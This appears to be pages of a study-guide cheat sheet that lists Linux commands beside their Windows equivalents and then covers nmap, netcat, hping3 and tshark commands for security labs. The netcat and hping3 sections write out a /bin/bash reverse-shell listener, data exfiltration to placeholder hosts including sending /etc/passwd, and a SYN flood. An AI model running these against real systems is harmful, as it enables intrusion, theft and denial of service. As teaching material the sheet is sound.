Function Linux Command Windows Command Description

Listing Files ls dir Lists files in a directory

ls -a dir /a Lists all files, including hidden
files
ls -l dir /q Lists files in long format, showing
permissions, owner, size
ls -R tree Lists directory contents recursively
Copying Files cp source dest copy source dest Copies a file from source to
destination
cp -r source_directory/ xcopy source_directory Recursively copies all files and
dest/ dest /E directories
Moving & mv oldname newname ren oldname newname Renames or moves a file
Renaming
mv file.txt move file.txt destination Moves file to a specified directory
/path/to/directory/
Deleting Files rm file.txt del file.txt Deletes a file
rm -r directory rmdir /s directory Recursively deletes a directory and
its contents
Creating Files touch filename echo.> filename Creates an empty file
Viewing File cat file.txt type file.txt Displays contents of a file
Contents
head -n 5 file.txt more file.txt Displays the first 5 lines of a file
tail -n 5 file.txt type file.txt Displays the last 5 lines of a file
Directory cd /path/to/directory cd \path\to\directory Changes directory
Navigation
pwd cd (no arguments) Displays the current directory
tree tree Shows directory structure in tree
format
File Permissions chmod 755 filename icacls filename /grant Sets file permissions
user:F
chmod 770 ~/projects icacls folder /grant Sets read, write, execute
~/resources user:F permissions for owner/group
chown user:group file.txt takeown /f filename Changes ownership of a file
Disk Usage df -h wmic logicaldisk get Shows disk usage
size,freespace
du -sh /path/to/directory chkdsk Shows size of a specific directory
System uname -a systeminfo Displays system information
Information
uptime systeminfo Shows system uptime
free -h systeminfo Shows memory usage
lscpu wmic cpu get name Displays CPU information
lsusb devmgmt.msc Displays USB device information
lspci devmgmt.msc Displays PCI device information
Network ifconfig ipconfig Shows network interfaces and
Management configurations
ping address ping address Tests network connectivity
netstat -tulnp netstat -an Shows network connections
traceroute address tracert address Traces the route packets take to a
network
nslookup domain nslookup domain Queries DNS for domain name or
IP
Process ps aux tasklist Lists running processes
Management
kill PID taskkill /PID Terminates a process by PID
top taskmgr Displays real-time processes and
resource usage
nice -n 10 command start /low command Starts a command with specified
priority
User Management useradd username net user username /add Adds a new user
| P a g e 15
 passwd username net user username * Sets or changes a user's password
passwd -l root net user Administrator Locks a user account
/active:no
passwd -u root net user Administrator Unlocks a user account
/active:yes
userdel username net user username Deletes a user
/delete
whoami whoami Shows the current user
groups username net localgroup Displays groups a user belongs to
sudo visudo -f - Edits the sudoers file for
/etc/sudoers permissions
sudo usermod -aG group net localgroup group Adds a user to a group
username username /add
Environment export VAR=value set VAR=value Sets environment variables
Variables
printenv VAR echo %VAR% Displays an environment variable
Text Processing grep "pattern" file.txt findstr "pattern" file.txt Searches for a pattern in a file
awk '{print $1}' file.txt - Text processing and manipulation
sed 's/old/new/g' file.txt sed Replaces text in a file
sort file.txt sort Sorts lines in a file
uniq file.txt uniq Removes duplicate lines
wc -l file.txt find /c Counts lines, words, and characters
in a file
Archiving & tar -cvf archive.tar files tar Archives files into a .tar file
Compression
gzip file gzip file Compresses a file using gzip
zip archive.zip file zip archive.zip file Creates a .zip archive
unzip archive.zip unzip archive.zip Extracts a .zip archive
Scheduling Tasks cron / crontab -e schtasks Schedules tasks
at 15:00 /path/to/script.sh at 15:00 task Executes a task at a specified time
Forensics dd if=/dev/sdX diskcopy Copies data at the block level
of=image.dd
strings file Sysinternals strings Extracts readable text from binary
files
sha256sum file certutil -hashfile file Checks file integrity using SHA-
SHA256 256
mount /dev/sdX /mnt diskpart Mounts or unmounts file systems
lsof handle (Sysinternals) Lists open files
Shutdown & shutdown -h now shutdown /s Shuts down the system
Reboot
reboot shutdown /r Reboots the system
poweroff shutdown /s Powers off the system
Help & man command command /? Displays manual for a command
Documentation
info command - Displays detailed information
about a command
Additional su - username Switch to another user
commands
sudo ls /root Execute ls as root
sudo groupadd project Create a group project
sudo usermod -aG project Add user to group project
student
grep -i "unauthorized" Search logs for unauthorized
/var/log/auth.log access
Nmap Commands sudo nmap -sn 192.168.1.0/24 Discovers active hosts
sudo nmap -sS -p 1-1000 [IP_address] SYN scan of ports 1-1000
sudo nmap -sV -sS -p 80,443,22 [IP_address] Detects service versions
sudo nmap -O [IP_address] OS detection
sudo nmap --script vuln [IP_address] Scans for common vulnerabilities
| P a g e 16
Netcat (nc) nc -v [IP_address] [port] Retrieves server banners
Commands
nc -zv [IP_address] 20-80 Scans ports
nc -lp 55555 > sensitive_data.txt Sets up a listener for file transfer
nc [Server_IP] 55555 < extracted_data.txt Simulates data exfiltration
nc -lp 4444 -e /bin/bash Reverse shell listener
nc [Target_IP] 4444 Connects to reverse shell
hping3 sudo hping3 -S --flood -p 80 [IP_address] SYN flood test
Commands
sudo hping3 -A -p 80 [IP_address] ACK scan (firewall testing)
sudo hping3 -2 -p 53 [IP_address] UDP port scan
sudo hping3 -1 [IP_address] ICMP scan for blocked pings
sudo hping3 -c 1 [IP_address] -d 100 -E /etc/passwd Simulates data exfiltration
Wireshark `ip.addr == [Target_IP] && (tcp
Commands
tcp.flags.ack==1 && tcp.flags.rst==1 Tracks connection resets and
anomalies in TCP responses
Captures ARP traffic to detect
sudo tshark -i eth0 -f "arp"
ARP spoofing (MITM attack).
Monitors DNS traffic for malicious
sudo tshark -i eth0 -f "udp port 53"
redirects.
Captures and analyzes HTTP
sudo tshark -i eth0 -f "tcp port 80" traffic for suspicious patterns like
data exfiltration.
Monitors FTP traffic for potential
sudo tshark -i eth0 -f "tcp port 21"
data exfiltration.
Captures TCP SYN packets to
sudo tshark -i eth0 -Y "tcp.flags.syn == 1 &&
detect potential SYN flood DoS
tcp.flags.ack == 0"
attacks.
Captures POST requests during a
sudo tshark -i eth0 -f "tcp port 80" -Y
DoS attack to check for data
"http.request.method == POST"
exfiltration.
`sudo netstat -anp `netstat -ano
Blocks IPs involved in DoS
sudo iptables -A INPUT -s <attacker_IP> -j DROP
attacks.
Extracts browsing history entries
sqlite3 /path/to/history.db "SELECT url, title FROM
SQLite that match specific queries (e.g.,
urls WHERE url LIKE '%query%'
phishing URLs).
Retrieves call logs from a SQLite
sqlite3 /path/to/calllog.db "SELECT * FROM calls;"
database.
Recovers deleted files from a
foremost -i /path/to/device -o /output_directory
storage device.
lsusb Lists any external devices

| P a g e 17